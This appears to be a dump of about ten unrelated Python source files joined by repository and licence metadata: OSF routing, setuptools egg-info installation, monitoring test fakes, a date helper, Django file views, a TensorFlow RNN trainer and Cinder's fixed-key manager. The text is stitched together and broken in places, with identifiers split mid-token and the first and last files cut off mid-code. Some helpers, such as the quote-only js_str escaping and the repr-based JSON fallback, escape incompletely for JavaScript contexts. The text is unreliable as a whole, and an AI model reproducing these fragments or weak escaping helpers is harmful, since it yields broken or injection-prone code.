        'status': status.pop_status_messages(),
        'domain': settings.DOMAIN,
        'disk_saving_mode': settings.DISK_SAVING_MODE,
        'language': language,
        'web_url_for': util.web_url_for,
        'api_url_for': util.api_url_for,
        'api_v2_url': util.api_v2_url,  # URL function for templates
        'api_v2_base': util.api_v2_url(''),  # Base url used by JS api helper
        'sanitize': sanitize,
        # Escape quotes so values can be embedded in inline JS string literals.
        'js_str': lambda x: x.replace("'", r"\'").replace('"', r'\"'),
        'sjson': lambda s: sanitize.safe_json(s),
        'webpack_asset': paths.webpack_asset,
        'waterbutler_url': settings.WATERBUTLER_URL,
        'login_url': cas.get_login_url(request.url, auto=True),
        'access_token': session.data.get('auth_user_access_token') or '',
        'auth_url': cas.get_login_url(request.url),
        'profile_url': cas.get_profile_url(),
    }
class OsfWebRenderer(WebRenderer):
    """Render a Mako template with OSF context vars.

    :param trust: Optional. If ``False``, markup-safe escaping will be enabled
    """
    def __init__(self, *args, **kwargs):
        # Inject the OSF-wide template context (user info, settings, helpers)
        # into every render; WebRenderer calls this to build the context.
        kwargs['data'] = get_globals
        super(OsfWebRenderer, self).__init__(*args, **kwargs)
#: Sentinel renderer for views that only redirect or raise an error —
#: no Mako template lookup is needed.
notemplate = OsfWebRenderer('', renderer=render_mako_string)
# Static files (robots.txt, etc.)
def favicon():
    """Serve the site favicon from the static folder."""
    icon_mimetype = 'image/vnd.microsoft.icon'
    return send_from_directory(settings.STATIC_FOLDER,
                               'favicon.ico',
                               mimetype=icon_mimetype)
def robots():
    """Serves the robots.txt file."""
    # A deployment-local robots.local.txt, when present, overrides the
    # default robots.txt.
    local_override = os.path.join(settings.STATIC_FOLDER, 'robots.local.txt')
    chosen = 'robots.local.txt' if os.path.exists(local_override) else 'robots.txt'
    return send_from_directory(settings.STATIC_FOLDER,
                               chosen,
                               mimetype='text/plain')
def goodbye():
    """Logout landing page; logged-in users are bounced to the dashboard."""
    user = _get_current_user()
    if user:
        return redirect(util.web_url_for('dashboard'))
    # Anonymous: show the goodbye page with a success flash message.
    status.push_status_message(language.LOGOUT, 'success')
    return {}
def make_url_map(app):
"""Set up all the routes for the OSF app.
:param app: A Flask/Werkzeug app to bind the rules to.
"""
# Set default views to 404, using URL-appropriate renderers
process_rules(app, [
Rule('/<path:_>', ['get', 'post'], HTTPError(http.NOT_FOUND),
OsfWebRenderer('', render_mako_string)),
Rule('/api/v1/<path:_>', ['get', 'post'],
HTTPError(http.NOT_FOUND), json_renderer),
])
### GUID ###
process_rules(app, [
Rule(
[
'/<guid>/',
'/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
notemplate,
),
Rule(
[
'/api/v1/<guid>/',
'/api/v1/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
json_renderer,
),
])
# Static files
process_rules(app, [
Rule('/favicon.ico', 'get', favicon, json_renderer),
Rule('/robots.txt', 'get', robots, json_renderer),
])
### Base ###
process_rules(app, [
Rule('/dashboard/', 'get', website_views.dashboard, OsfWebRenderer('dashboard.mako')),
Rule('/reproducibility/', 'get',
website_views.reproducibility, OsfWebRenderer('', render_mako_string)),
Rule('/about/', 'get', website_views.redirect_about, json_renderer,),
Rule('/howosfworks/', 'get', website_views.redirect_howosfworks, json_renderer,),
Rule('/faq/', 'get', {}, OsfWebRenderer('public/pages/faq.mako')),
Rule('/getting-started/', 'get', {}, OsfWebRenderer('public/pages/getting_started.mako')),
Rule('/explore/', 'get', {}, OsfWebRenderer('public/explore.mako')),
Rule(['/messages/', '/help/'], 'get', {}, OsfWebRenderer('public/comingsoon.mako')),
Rule(
'/view/<meeting>/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting.mako'),
),
Rule(
'/view/<meeting>/plain/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting_plain.mako'),
endpoint_suffix='__plain',
),
Rule(
'/api/v1/view/<meeting>/',
'get',
conference_views.conference_data,
json_renderer,
),
Rule(
'/meetings/',
'get',
conference_views.conference_view,
OsfWebRenderer('public/pages/meeting_landing.mako'),
),
Rule(
'/presentations/',
'get',
conference_views.redirect_to_meetings,
json_renderer,
),
Rule('/news/', 'get', {}, OsfWebRenderer('public/pages/news.mako')),
])
# Site-wide API routes
process_rules(app, [
Rule(
'/citations/styles/',
'get',
citation_views.list_citation_styles,
json_renderer,
),
], prefix='/api/v1')
process_rules(app, [
Rule(
[
'/project/<pid>/<addon>/settings/disable/',
'/project/<pid>/node/<nid>/<addon>/settings/disable/',
],
'post',
addon_views.disable_addon,
json_renderer
|
,
),
Rule(
'/profile/<uid>/<addon>/settings/',
'get',
addon_view
|
s.get_addon_user_config,
js
|
ohduran/CrowdFinanceInfographic
|
virtualenv/lib/python3.5/site-packages/setuptools/command/install_egg_info.py
|
Python
|
mit
| 5,027
| 0.001989
|
from distutils import log, dir_util
from distutils.errors import DistutilsOptionError
import os
import sys

from setuptools.extern.six.moves import map
from setuptools import Command
from setuptools.archive_util import unpack_archive

import pkg_resources
class install_egg_info(Command):
    """Install an .egg-info directory for the package"""

    description = "Install an .egg-info directory for the package"

    user_options = [
        ('install-dir=', 'd', "directory to install to"),
    ]

    def initialize_options(self):
        self.install_dir = None
        self.install_layout = None
        self.prefix_option = None

    def finalize_options(self):
        """Resolve options from the install/install_lib commands and compute
        the source .egg-info directory and the installation target path."""
        self.set_undefined_options('install_lib',
                                   ('install_dir', 'install_dir'))
        self.set_undefined_options('install',
                                   ('install_layout', 'install_layout'))
        # 'prefix_option' is only available on sufficiently new interpreters.
        if sys.hexversion > 0x2060000:
            self.set_undefined_options('install',
                                       ('prefix_option', 'prefix_option'))
        ei_cmd = self.get_finalized_command("egg_info")
        basename = pkg_resources.Distribution(
            None, None, ei_cmd.egg_name, ei_cmd.egg_version
        ).egg_name() + '.egg-info'
        if self.install_layout:
            if not self.install_layout.lower() in ['deb']:
                # BUG FIX: DistutilsOptionError was raised without ever being
                # imported, so a bad --install-layout crashed with NameError
                # instead of reporting the usage error (import added at top).
                raise DistutilsOptionError(
                    "unknown value for --install-layout")
            self.install_layout = self.install_layout.lower()
            # Debian layout: strip the -pyX.Y tag from the directory name.
            basename = basename.replace('-py%s' % pkg_resources.PY_MAJOR, '')
        elif self.prefix_option or 'real_prefix' in sys.__dict__:
            # don't modify for virtualenv
            pass
        else:
            basename = basename.replace('-py%s' % pkg_resources.PY_MAJOR, '')
        self.source = ei_cmd.egg_info
        self.target = os.path.join(self.install_dir, basename)
        self.outputs = []

    def run(self):
        """Copy the .egg-info tree into place (replacing any previous one),
        then install namespace-package .pth shims."""
        self.run_command('egg_info')
        if os.path.isdir(self.target) and not os.path.islink(self.target):
            dir_util.remove_tree(self.target, dry_run=self.dry_run)
        elif os.path.exists(self.target):
            self.execute(os.unlink, (self.target,), "Removing " + self.target)
        if not self.dry_run:
            pkg_resources.ensure_directory(self.target)
        self.execute(
            self.copytree, (), "Copying %s to %s" % (self.source, self.target)
        )
        self.install_namespaces()

    def get_outputs(self):
        # Files recorded while copying/installing; used for --record support.
        return self.outputs

    def copytree(self):
        # Copy the .egg-info tree to site-packages
        def skimmer(src, dst):
            # filter out source-control directories; note that 'src' is always
            # a '/'-separated path, regardless of platform. 'dst' is a
            # platform-specific path.
            for skip in '.svn/', 'CVS/':
                if src.startswith(skip) or '/' + skip in src:
                    return None
            if self.install_layout and self.install_layout in ['deb'] and src.startswith('SOURCES.txt'):
                log.info("Skipping SOURCES.txt")
                return None
            self.outputs.append(dst)
            log.debug("Copying %s to %s", src, dst)
            return dst
        unpack_archive(self.source, self.target, skimmer)

    def install_namespaces(self):
        """Write a <dist>-nspkg.pth file that stitches this distribution's
        namespace packages together at interpreter startup."""
        nsp = self._get_all_ns_packages()
        if not nsp:
            return
        filename, ext = os.path.splitext(self.target)
        filename += '-nspkg.pth'
        self.outputs.append(filename)
        log.info("Installing %s", filename)
        lines = map(self._gen_nspkg_line, nsp)
        if self.dry_run:
            # always generate the lines, even in dry run
            list(lines)
            return
        with open(filename, 'wt') as f:
            f.writelines(lines)

    # Template statements executed by site.py for each namespace package:
    # they create/extend the package's __path__ without an __init__.py.
    _nspkg_tmpl = (
        "import sys, types, os",
        "p = os.path.join(sys._getframe(1).f_locals['sitedir'], *%(pth)r)",
        "ie = os.path.exists(os.path.join(p,'__init__.py'))",
        "m = not ie and "
        "sys.modules.setdefault(%(pkg)r, types.ModuleType(%(pkg)r))",
        "mp = (m or []) and m.__dict__.setdefault('__path__',[])",
        "(p not in mp) and mp.append(p)",
    )
    "lines for the namespace installer"

    # Extra statement binding a child namespace module onto its parent.
    _nspkg_tmpl_multi = (
        'm and setattr(sys.modules[%(parent)r], %(child)r, m)',
    )
    "additional line(s) when a parent package is indicated"

    @classmethod
    def _gen_nspkg_line(cls, pkg):
        """Render one ';'-joined .pth line for namespace package `pkg`."""
        # ensure pkg is not a unicode string under Python 2.7
        pkg = str(pkg)
        pth = tuple(pkg.split('.'))
        tmpl_lines = cls._nspkg_tmpl
        parent, sep, child = pkg.rpartition('.')
        if parent:
            tmpl_lines += cls._nspkg_tmpl_multi
        return ';'.join(tmpl_lines) % locals() + '\n'

    def _get_all_ns_packages(self):
        """Return sorted list of all package namespaces"""
        # Include every ancestor of each declared namespace package
        # (e.g. 'a.b.c' contributes 'a', 'a.b' and 'a.b.c').
        nsp = set()
        for pkg in self.distribution.namespace_packages or []:
            pkg = pkg.split('.')
            while pkg:
                nsp.add('.'.join(pkg))
                pkg.pop()
        return sorted(nsp)
|
pythonthusiast/Northed
|
main.py
|
Python
|
gpl-3.0
| 49
| 0.020408
|
__author__ = 'Eko Wibowo'

# Smoke-test entry point: prints a greeting when the module is executed.
print('Hello Python!')
|
Nekmo/simple-monitor-alert
|
simple_monitor_alert/tests/base.py
|
Python
|
mit
| 3,106
| 0.001932
|
import os
import sys
from configparser import NoSectionError
from simple_monitor_alert.alerts import Alerts
from simple_monitor_alert.lines import Observable, ItemLine
from simple_monitor_alert.monitor import Monitors
from simple_monit
|
or_alert.sma import Results, Config, MonitorsInfo
from simple_monitor_alert.utils.files import JSONFile
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
MONITORS_DIR = os.path.join(BASE_DIR, 'assets', 'monitors')
class FakeJSONFile(JSONFile):
    """In-memory JSONFile test double: seeded from a dict, never touches disk."""

    def __init__(self, data):
        # Fake path; create=False keeps the base class from writing the file.
        super(FakeJSONFile, self).__init__('/Fake-JSON-File', create=False)
        self.update(data)

    def read(self):
        # No-op: contents live only in memory.
        pass

    def write(self):
        # No-op: nothing is ever persisted.
        pass
class FakeObservableResults(FakeJSONFile, Results):
    """In-memory Results store, nested as monitors -> observable name -> result."""

    # Fallback monitor name used when an observable has no .monitor attribute.
    monitor = None

    def __init__(self, data=None, sma=None):
        data = data or {'monitors': {}}
        super(FakeObservableResults, self).__init__(data)
        self.sma = sma

    def get_observable_result(self, observable):
        # Look up (and lazily create) the result slot for this observable,
        # writing the default entry back into the nested dict so later calls
        # see the same object.
        monitor = self['monitors'].get(getattr(observable, 'monitor', self.monitor), {})
        result = monitor.get(observable.name, self.get_default_observable_result())
        monitor[observable.name] = result
        self['monitors'][getattr(observable, 'monitor', self.monitor)] = monitor
        return result
class FakeMonitorsInfo(FakeJSONFile, MonitorsInfo):
    """MonitorsInfo backed by the in-memory FakeJSONFile."""
    pass
class FakeMonitors(Monitors):
    """Alias of the real Monitors class, kept for symmetry with other fakes."""
    pass
class FakeSMA(object):
    """Minimal SMA aggregate: wires fake results/info/config to real Monitors."""

    def __init__(self, config=None, monitors_info=None, monitors_dir=MONITORS_DIR):
        self.results = FakeObservableResults()
        self.monitors_info = monitors_info or FakeMonitorsInfo({})
        self.config = config
        # Real Monitors instance pointed at the test fixtures directory.
        self.monitors = FakeMonitors(monitors_dir, sma=self)
class FakeAlert(object):
    """Alert-backend test double: counts deliveries, always reports success."""

    # Class-level default; the first send() shadows it with an instance value.
    executions = 0

    def __init__(self, section):
        self.section = section

    def send(self, *args, **kwargs):
        """Pretend to deliver an alert and record the invocation."""
        self.executions = self.executions + 1
        return True
class FakeConfig(Config):
    """Config double whose sections are served from a plain dict."""

    def __init__(self, data):
        if sys.version_info >= (3, 0):
            super().__init__('/Fake-Config-File')
        else:
            # Old Style Class
            Config.__init__(self, '/Fake-Config-File')
        self._data = data

    def items(self, section=None, **kwargs):
        try:
            return self._data[section]
        except KeyError:
            # Mirror configparser behaviour for unknown sections.
            raise NoSectionError(section)
class TestBase(object):
    """Shared fixture builders for simple-monitor-alert test cases."""

    def get_observable(self):
        # Observable whose value (19) is below the expected threshold (20),
        # i.e. a condition that should trigger an alert.
        observable = Observable('test')
        observable.add_line(ItemLine('test.expected', '20'))
        observable.add_line(ItemLine('test.value', '19'))
        return observable

    def get_alerts(self, section, sma):
        # Alerts container wired to a single FakeAlert for `section`.
        alerts_modules = [FakeAlert(section)]
        alerts = Alerts(sma, '/Fake-Alerts-Dir', alerts_modules, [section])
        return alerts

    def get_results(self, data=None, monitors_info=None):
        return FakeObservableResults(data, FakeSMA(monitors_info=monitors_info).monitors_info)

    def get_sma(self, section=None, monitors_info=None):
        config = FakeConfig({section: ()})
        sma = FakeSMA(config, monitors_info=monitors_info)
        return sma
|
asciidisco/plugin.video.netflix
|
resources/test/test_NetflixSession.py
|
Python
|
mit
| 321
| 0.003115
|
# -*- coding: utf-8 -*-
# Module: NetflixSession
# Author: asciidisco
# Created on: 11.1
|
0.2017
# License: MIT https://goo.gl/5bMj3H
"""Tests for the `NetflixSession` module"""
import unittest
import mock
from resources.lib.NetflixSession import NetflixSession
class NetflixSessionTestCase(unittest.TestCase):
    # Placeholder suite: no tests implemented yet for NetflixSession.
    pass
|
neonichu/status-boards
|
relativeDates.py
|
Python
|
mit
| 2,360
| 0.004237
|
import datetime
def ungettext(a, b, count):
    """Minimal stand-in for Django's ungettext: return the singular form `a`
    for exactly one item, the plural form `b` otherwise (including zero).

    :param a: singular form, e.g. 'year'
    :param b: plural form, e.g. 'years'
    :param count: number of items being described
    """
    # BUG FIX: the original returned the plural for any truthy count, so a
    # count of 1 produced strings like "1 years" / "1 minutes" in timesince.
    return a if count == 1 else b
def ugettext(a):
    """Identity stand-in for Django's ugettext; no translation is performed."""
    return a
def timesince(d, now=None):
    """
    Takes two datetime objects and returns the time between d and now
    as a nicely formatted string, e.g. "10 minutes". If d occurs after now,
    then "0 minutes" is returned.

    Units used are years, months, weeks, days, hours, and minutes.
    Seconds and microseconds are ignored. Up to two adjacent units will be
    displayed. For example, "2 weeks, 3 days" and "1 year, 3 months" are
    possible outputs, but "2 weeks, 3 hours" and "1 year, 5 days" are not.
    Adapted from http://blog.natbat.co.uk/archive/2003/Jun/14/time_since
    """
    # (seconds per unit, pluralizing name) ordered from largest to smallest;
    # months are approximated as 30 days, years as 365 days.
    chunks = (
        (60 * 60 * 24 * 365, lambda n: ungettext('year', 'years', n)),
        (60 * 60 * 24 * 30, lambda n: ungettext('month', 'months', n)),
        (60 * 60 * 24 * 7, lambda n: ungettext('week', 'weeks', n)),
        (60 * 60 * 24, lambda n: ungettext('day', 'days', n)),
        (60 * 60, lambda n: ungettext('hour', 'hours', n)),
        (60, lambda n: ungettext('minute', 'minutes', n))
    )
    # Convert datetime.date to datetime.datetime for comparison.
    if not isinstance(d, datetime.datetime):
        d = datetime.datetime(d.year, d.month, d.day)
    if now and not isinstance(now, datetime.datetime):
        now = datetime.datetime(now.year, now.month, now.day)
    if not now:
        if d.tzinfo:
            # BUG FIX: the original referenced an undefined LocalTimezone
            # name (NameError for aware datetimes). Reuse d's own tzinfo so
            # the subtraction below compares two aware datetimes.
            now = datetime.datetime.now(d.tzinfo)
        else:
            now = datetime.datetime.now()
    # ignore microsecond part of 'd' since we removed it from 'now'
    delta = now - (d - datetime.timedelta(0, 0, d.microsecond))
    since = delta.days * 24 * 60 * 60 + delta.seconds
    if since <= 0:
        # d is in the future compared to now, stop processing.
        return u'0 ' + ugettext('minutes')
    # Find the largest unit with a non-zero count.
    for i, (seconds, name) in enumerate(chunks):
        count = since // seconds
        if count != 0:
            break
    s = ugettext('%(number)d %(type)s') % {'number': count, 'type': name(count)}
    if i + 1 < len(chunks):
        # Now get the second item
        seconds2, name2 = chunks[i + 1]
        count2 = (since - (seconds * count)) // seconds2
        if count2 != 0:
            s += ugettext(', %(number)d %(type)s') % {'number': count2, 'type': name2(count2)}
    return s
|
emanuelcovaci/TLT
|
blog/file/views.py
|
Python
|
agpl-3.0
| 2,918
| 0.004455
|
import json
import os
from django.contrib.admin.views.decorators import staff_member_required
from django.db.models import Q
from django.http import HttpResponse, HttpResponseForbidden, Http404
from django.http.respon
|
se import JsonResponse
from django.conf import settings
from django.shortcuts import get_object_or_404, redirect
from django.views.static import serve
from models import Post
from forms import PostFormSet
import blog.settings
def files_filter(request):
    """Search article files by file name or author name (GET param `query`).

    Returns JSON: {'results': [{'name', 'author', 'file'}, ...]}.
    """
    # NOTE(review): request.GET["query"] is read unconditionally — a request
    # without the parameter raises MultiValueDictKeyError (HTTP 500); confirm
    # callers always supply it.
    return JsonResponse({'results': list(Post.objects.filter(Q(name__contains=request.GET["query"]) |
                                                             Q(author__first_name__contains=request.GET["query"]) |
                                                             Q(author__last_name__contains=request.GET["query"]),
                                                             location="articolFiles")
                                         .values('name', 'author', 'file'))})
@staff_member_required
def add_multiple_files(request):
    """Bulk-upload Post files via a formset (staff-only, POST-only).

    On success redirects to the admin changelist; on validation failure
    returns the formset errors as JSON with status 400; non-POST gets 403.
    """
    if request.method == "POST":
        formset = PostFormSet(data=request.POST or None, files=request.FILES or None)
        if formset.is_valid():
            instances = formset.save(commit=False)
            for instance in instances:
                # Stamp the uploading staff member as author before saving.
                instance.author = request.user
                instance.save()
            formset.save_m2m()
            return redirect("/admin/file/post/")
        else:
            response = HttpResponse(json.dumps({"errors": formset.errors}),
                                    content_type='application/json')
            response.status_code = 400
            return response
    else:
        return HttpResponseForbidden()
@staff_member_required
def page_preview(request):
    """Return an HTML skeleton for previewing content (staff-only, GET-only).

    The literal "{0}"/"{1}" placeholders are left in the response —
    presumably filled in by the client (title/body and date); only the
    author's full name is rendered server-side. TODO confirm against caller.
    """
    if request.method == "GET":
        return HttpResponse(
            "<head><title>" + "{0}" + '</title><link rel="stylesheet" type="text/css" '
            'href="/static/prism/prism.css"><script '
            'src="/static/prism/prism.js"></script></head><body>' + "{0}<br>" +
            request.user.get_full_name() + "<br>{1}" + "</body>")
    else:
        return HttpResponseForbidden()
@staff_member_required
def download_interior_file(request, slug):
    """Stream the stored file of the Post with `slug` as a forced download.

    Raises Http404 when the Post exists but its file is missing on disk.
    """
    given_file = get_object_or_404(Post, slug=slug)
    path = given_file.file.path
    file_path = os.path.join(settings.MEDIA_ROOT, path)
    if os.path.exists(file_path):
        # Whole file is read into memory; fine for the small article
        # attachments this serves.
        with open(file_path, 'rb') as fh:
            response = HttpResponse(fh.read(), content_type="application/force-download")
            response['Content-Disposition'] = 'inline; filename=' + os.path.basename(file_path)
            return response
    raise Http404
def exterior_files(request, location, path):
    """Serve a media file from documents/<location>/<path>.

    Requests for the "articolFiles" location are not served here (the view
    implicitly returns None for them — presumably handled by another route;
    TODO confirm).
    """
    # BUG FIX: the original used `location is not "articolFiles"`, which
    # compares object identity rather than string content. Identity of string
    # literals is an interpreter implementation detail (and a SyntaxWarning
    # on modern CPython), so the guard could silently misbehave.
    if location != "articolFiles":
        return serve(request, os.path.join("documents", location, path),
                     document_root=blog.settings.MEDIA_ROOT)
rsms/smisk
|
lib/smisk/mvc/template/filters.py
|
Python
|
mit
| 375
| 0.026667
|
# encoding: utf-8
'''Temp
|
late filters
'''
def j(s):
    """Escape for JavaScript or encode as JSON"""
    # Placeholder: rebound below to the best available JSON encoder.
    pass
# Pick the fastest available JSON encoder: cjson first, then minjson, then a
# minimal repr()-based fallback that merely escapes quotes and backslashes.
try:
    from cjson import encode as _json
except ImportError:
    try:
        from minjson import write as _json
    except ImportError:
        import re
        _RE = re.compile(r'(["\'\\])')
        def _json(s):
            # NOTE(review): repr() output is Python-flavoured (may yield
            # single quotes / u'' prefixes), not strict JSON — verify
            # downstream consumers accept it.
            return repr(_RE.sub(r'\\\1', s)).replace('\\\\', '\\')
# Rebind the public template filter to the selected implementation.
j = _json
|
TUM-LMF/fieldRNN
|
train.py
|
Python
|
mit
| 20,521
| 0.00731
|
import tensorflow as tf
import cPickle as pickle
import rnn_model
import cnn_model
from dataloader import Dataloader
#import psycopg2
import os
import datetime
import numpy as np
import argparse
from util.util import write_status_file, read_status_file, params2name
import sys
"""
This file contains three functions.
main() provides a shell interface for training from CLI
train_{rnn|cnn} are called by main to perform the training on {rnn|cnn}_model Tensorflow Graphs
Dependencies:
Dataloader.py
rnn_model.py
cnn_model.py
"""
def train_rnn(model,
train_dataloader,
test_dataloader,
savedir="save/tmp",
max_epoch=None,
log_every=20,
save_every=100,
pr
|
int_every=5,
init_from=None,
max_ckpts_to_keep=5,
ckpt_every_n_hours=10000,
allow_gpu_mem_growth=True,
gpu_memory_fraction=0.3,
**kwargs):
"""
This function performs the training operation on a tensorflow rnn_model.py model
:param model: rnn_model object containing tensorflow graph
:param train_dataloader: DataLoader object for Training data
:param test_dataloader: DataLoader object for
|
Testing data
:param savedir: directory to store event and save files
:param max_epoch: hard maximum for number of epochs
:param log_every: Frequency of TensorFlow summary recordings
:param save_every: checkpoint save frequency
:param print_every: console log frequency
:param init_from: initialize weights from checkpoint files
:param max_ckpts_to_keep: tf.train.Saver: maximum number of checkpoint files
:param ckpt_every_n_hours: save every n hours
:param allow_gpu_mem_growth:dynamic growth of gpu vram
:param gpu_memory_fraction: hard upper limit for gpu vram
:return: True if success
"""
terminate = False
if not os.path.exists(savedir + "/train"):
os.makedirs(savedir + "/train")
if not os.path.exists(savedir + "/test"):
os.makedirs(savedir + "/test")
# save list of classes
#np.save(os.path.join(savedir, "classes.npy"), train_dataloader.classes)
# dump pickle args for loading
with open(os.path.join(savedir, "args.pkl"), "wb") as f:
pickle.dump(model.args, f)
# dump human readable args
open(os.path.join(savedir, "args.txt"), "w").write(str(model.args))
train_summary_writer = tf.summary.FileWriter(savedir + "/train", graph=tf.get_default_graph())
test_summary_writer = tf.summary.FileWriter(savedir + "/test", graph=tf.get_default_graph())
saver = tf.train.Saver(max_to_keep=max_ckpts_to_keep, keep_checkpoint_every_n_hours=ckpt_every_n_hours)
step = 0
t_last = datetime.datetime.now()
total_cm_train = total_cm_test = np.zeros((model.n_classes, model.n_classes))
config = tf.ConfigProto()
config.gpu_options.allow_growth = allow_gpu_mem_growth
config.gpu_options.per_process_gpu_memory_fraction = gpu_memory_fraction
config.allow_soft_placement = True
config.log_device_placement = False
train_cross_entropy = None
test_cross_entropy = None
eta = None
print("start")
with tf.Session(config=config) as sess:
sess.run([model.init_op])
if init_from is not None:
if os.path.exists(init_from):
try:
ckpt = tf.train.get_checkpoint_state(init_from)
print("restoring model from %s" % ckpt.model_checkpoint_path)
saver.restore(sess, ckpt.model_checkpoint_path)
step, epoch = read_status_file(init_from)
train_dataloader.epoch = epoch
except:
print "error at {} ignoring".format(init_from)
init_from = None
pass
i = 0
while (train_dataloader.epoch < max_epoch) or terminate:
i += 1
# step as number of features -> invariant to changes in batch size
step += train_dataloader.batch_size
s_db = datetime.datetime.now()
X, y, seq_lengths = train_dataloader.next_batch()
e_db = datetime.datetime.now()
feed = {model.X: X, model.y_: y, model.seq_lengths: seq_lengths}
# training step
_, cm = sess.run([model.train_op, model.confusion_matrix], feed_dict=feed)
#total_cm_train += cm
e_tr = datetime.datetime.now()
dt_db = e_db - s_db
dt_tr = e_tr - e_db
field_per_s = train_dataloader.batch_size / (datetime.datetime.now() - t_last).total_seconds()
# approximate calculation time
approx_calc_time = (((max_epoch * train_dataloader.num_feat) - step) / field_per_s)
eta = datetime.datetime.now() + datetime.timedelta(seconds=approx_calc_time)
t_last = datetime.datetime.now()
if i % print_every == 0:
train_cross_entropy = sess.run(model.cross_entropy, feed_dict=feed)
msg = "Training: Iteration {}, feature {}, epoch {}, batch {}/{}: xentr {:.2f} " \
"(time: db {}ms; train {}ms, {} feat/s, eta: {})".format(
i,
step,
train_dataloader.epoch,
train_dataloader.batch,
train_dataloader.num_batches,
train_cross_entropy,
int(dt_db.total_seconds() * 1000),
int(dt_tr.total_seconds() * 1000),
int(field_per_s),
eta.strftime("%d.%b %H:%M")
)
print(msg)
if i % log_every == 0: # Record summaries and test-set accuracy
# record with train data
summary = sess.run(model.merge_summary_op, feed_dict=feed)
train_summary_writer.add_summary(summary, step)
# record with test data
X, y, seq_lengths = test_dataloader.next_batch()
feed = {model.X: X, model.y_: y, model.seq_lengths: seq_lengths}
test_cross_entropy, summary = sess.run([model.cross_entropy, model.merge_summary_op], feed_dict=feed)
#total_cm_test += cm
test_summary_writer.add_summary(summary, step)
with tf.name_scope('performance'):
# custom summaries
summary = tf.Summary(value=[
tf.Summary.Value(tag="fields_per_sec", simple_value=field_per_s),
tf.Summary.Value(tag="query_time_sec", simple_value=dt_db.total_seconds()),
tf.Summary.Value(tag="train_time_sec", simple_value=dt_tr.total_seconds())
])
train_summary_writer.add_summary(summary, step)
print("writing summary")
if i % save_every == 0:
if not os.path.exists(savedir):
os.makedirs(savedir)
last_checkpoint = os.path.join(savedir, 'model.ckpt')
saver.save(sess, last_checkpoint, global_step=step)
write_status_file(savedir, step, train_dataloader.epoch)
# update task table
if "update_callback" in kwargs.keys() and (train_cross_entropy is not None) and (test_cross_entropy is not None) and (eta is not None):
kwargs["update_callback"](step, train_dataloader.epoch, train_cross_entropy, test_cross_entropy, eta.strftime("%d.%b %H:%M"))
# save very last state
last_checkpoint = os.path.join(savedir, 'model.ckpt')
saver.save(sess, last_checkpoint, global_step=step)
write_status_file(savedir, step, train_dataloader.epoch)
# update task table
if "update_callback" in kwargs.keys() and (train_cross_entropy is not None) and (
test_cross_entropy is not None) and (eta is not None):
kwargs["update_callback"](step, train_dataloader.epoch, train_cross_entropy,
|
Thingee/cinder
|
cinder/keymgr/conf_key_mgr.py
|
Python
|
apache-2.0
| 4,809
| 0
|
# Copyright (c) 2013 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
An implementation of a key manager that reads its key from the project's
configuration options.
This key manager implementation provides limited security, assuming that the
key remains secret. Using the volume encryption feature as an example,
encryption provides protection against a lost or stolen disk, assuming that
the configuration file that contains the key is not stored on the disk.
Encryption also protects the confidentiality of data as it is transmitted via
iSCSI from the compute host to the storage host (again assuming that an
attacker who intercepts the data does not know the secret key).
Because this implementation uses a single, fixed key, it proffers no
protection once that key is compromised. In particular, different volumes
encrypted with a key provided by this key manager actually share the same
encryption key so *any* volume can be decrypted once the fixed key is known.
"""
import array
from oslo.config import cfg
from cinder import exception
from cinder.keymgr import key
from cinder.keymgr import key_mgr
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
key_mgr_opts = [
cfg.StrOpt('fixed_key',
help='Fixed key returned by key manager, specified in hex'),
]
CONF = cfg.CONF
CONF.register_opts(key_mgr_opts, group='keymgr')
LOG = logging.getLogger(__name__)
class ConfKeyManager(key_mgr.KeyManager):
    """Key Manager that supports one key defined by the fixed_key conf option.

    This key manager implementation supports all the methods specified by the
    key manager interface. This implementation creates a single key in response
    to all invocations of create_key. Side effects (e.g., raising exceptions)
    for each method are handled as specified by the key manager interface.
    """

    def __init__(self):
        super(ConfKeyManager, self).__init__()
        # The one and only key id this manager ever hands out.
        self.key_id = '00000000-0000-0000-0000-000000000000'

    def _generate_key(self, **kwargs):
        # Build a SymmetricKey from the configured hex string
        # (Python 2 str.decode('hex') turns hex text into raw bytes).
        _hex = self._generate_hex_key(**kwargs)
        return key.SymmetricKey('AES',
                                array.array('B', _hex.decode('hex')).tolist())

    def _generate_hex_key(self, **kwargs):
        # Fail loudly if the operator never configured keymgr.fixed_key.
        if CONF.keymgr.fixed_key is None:
            LOG.warn(_('config option keymgr.fixed_key has not been defined: '
                       'some operations may fail unexpectedly'))
            raise ValueError(_('keymgr.fixed_key not defined'))
        return CONF.keymgr.fixed_key

    def create_key(self, ctxt, **kwargs):
        """Creates a key.

        This implementation returns a UUID for the created key. A
        NotAuthorized exception is raised if the specified context is None.
        """
        if ctxt is None:
            raise exception.NotAuthorized()
        return self.key_id

    def store_key(self, ctxt, key, **kwargs):
        """Stores (i.e., registers) a key with the key manager."""
        if ctxt is None:
            raise exception.NotAuthorized()
        # Only the single fixed key can be "stored" — anything else is
        # rejected, since this backend cannot hold arbitrary keys.
        if key != self._generate_key():
            raise exception.KeyManagerError(
                reason="cannot store arbitrary keys")
        return self.key_id

    def copy_key(self, ctxt, key_id, **kwargs):
        # Copying is a no-op: there is only one key, so the "copy" is the
        # same fixed id.
        if ctxt is None:
            raise exception.NotAuthorized()
        return self.key_id

    def get_key(self, ctxt, key_id, **kwargs):
        """Retrieves the key identified by the specified id.

        This implementation returns the key that is associated with the
        specified UUID. A NotAuthorized exception is raised if the specified
        context is None; a KeyError is raised if the UUID is invalid.
        """
        if ctxt is None:
            raise exception.NotAuthorized()
        if key_id != self.key_id:
            raise KeyError(key_id)
        return self._generate_key()

    def delete_key(self, ctxt, key_id, **kwargs):
        # Deletion is refused: removing the fixed key would break every
        # volume encrypted with it.
        if ctxt is None:
